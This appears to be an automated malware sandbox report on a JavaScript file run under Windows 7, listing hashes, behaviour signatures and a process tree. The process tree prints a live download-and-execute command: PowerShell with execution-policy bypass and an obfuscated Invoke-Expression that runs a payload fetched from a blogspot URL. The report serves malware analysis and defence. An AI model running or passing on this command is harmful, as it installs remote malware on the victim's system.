Overview

overview

10

Static

static

1

cd4caace5e...2bf.js

windows7-x64

7

cd4caace5e...2bf.js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 02:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js

  • Size

    80KB

  • MD5

    5eed57a36b459c29a10dbc8458493a26

  • SHA1

    4be4299dc346dc3499adb4b01edd09b339d858a4

  • SHA256

    cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf

  • SHA512

    59192b7d17198bf257fe8de35ce9523f61a7eb8495647a784f6b386dfbf60642c5109bc37bccb580e71047d556a5ebf86e7943efe57d9f06c4435e57846732d2

  • SSDEEP

    768:rZQ0foU+Ui73GNNUZZQSYsVxU4Ua4UYdIMfVkArv6rAHcVxEBxVNoYdDBHBqabPg:oC1l2unjA06

Score
7/10
execution

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\cd4caace5e85b095654b499c34414a1d839ff30bf910993c3ebcdc1fbd9ff2bf.js
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2412-4-0x000007FEF5C9E000-0x000007FEF5C9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2412-5-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2412-6-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-7-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2412-8-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-9-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-10-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-11-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2412-12-0x000007FEF59E0000-0x000007FEF637D000-memory.dmp

    Filesize

    9.6MB

    Download